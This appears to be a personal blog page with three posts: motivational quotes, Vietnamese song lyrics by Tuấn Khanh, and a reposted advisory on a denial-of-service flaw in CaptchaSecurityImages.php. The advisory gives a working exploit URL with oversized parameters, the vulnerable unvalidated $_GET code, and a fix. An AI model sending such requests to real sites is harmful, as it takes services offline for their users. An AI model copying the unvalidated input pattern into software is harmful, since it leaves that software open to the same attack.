Quotes

Posted on by
Reply

“Try not to become a man of success but a man of value.” – Albert Einstein

“Be a first rate version of yourself, not a second rate version of someone else” – Judy Garland

“Fall seven times; stand up eight.” – Japanese proverb

“You must give up the life you planned in order to have the life that is waiting for you.” – Joseph Campbell

“The best time to plant a tree is 20 years ago. The second best time is now.” – Chinese Proverb

“You must be the change you want to see in the world.” – Gandhi

“Do what you can, with what you have, where you are.” – Theodore Roosevelt

“All is flux, nothing stays still.” – Heraclitus

“I am tomorrow, or some future day, what I establish today. I am today what I established yesterday or some previous day.” – James Joyce

“The mind can make a heaven out of hell or a hell out of heaven” – John Milton

“The foolish man seeks happiness in the distance; the wise grows it under his feet.” – James Oppenheim

“Try not to become a man of success but a man of value.” – Albert Einstein

Little music :-)

Posted on by
Reply


Ru Giấc Trên Đồi

Sáng tác: Tuấn Khanh

Nắng cuối ngày vàng phơi lưng đồi
Cánh én chiều về qua dốc cao
Bỗng muốn mời, mời em lên đồi
Ngắm nắng chiều ở con phố xa

Oh, em hãy nghe gió chiều
Em hãy để đôi chân trần
Bàn chân ngoan
chìm trong đám cỏ xanh một lần thôi

Sóng ngát hồn và mây ngang đầu
Hỡi suối nguồn về đâu đến đâu
Em hãy về ngả lưng trên đồi
Nắng sẽ mừng vàng phơi áo em

Oh, gối đầu trên cỏ mềm
Nghe êm ái trong mộng vàng
Ngủ đi em trong chiều vắng yên lành trên cao

Ru em cho ngày xanh thật dịu êm
Thương giấc ngủ ngon xa muộn phiền
Vỗ giấc cho ngày sau mộng thiền tiên
Xin giấc ngủ say trong mộng hiền (2x)

Ru em mong ngày quên lời điêu ngoa
Ru em mong được nghe lời thật thà

PHP Captcha Security Images DoS Vulnerability

Posted on by
Reply

@knowledge: Always escape inputs

# Exploit Title: CaptchaSecurityImages.php Denial Of Service
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
#
##[Denial Of Service]
(OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server) for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources used by it.)
#
#Exploit:
/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337
#
#
The vuln code is: (lines 73-75)
#
$width = isset($_GET['width']) ? $_GET['width'] : ’120′;
$height = isset($_GET['height']) ? $_GET['height'] : ’40′;
$characters = isset($_GET['characters']) && $_GET['characters'] > 1 ? $_GET['characters'] : ’6′;
#
To fix it- delete all the “$_GET[x]” strings and make it constant, like this:
#
$width=100;
$height=40;
$characters=5;
#
#
#[e0f]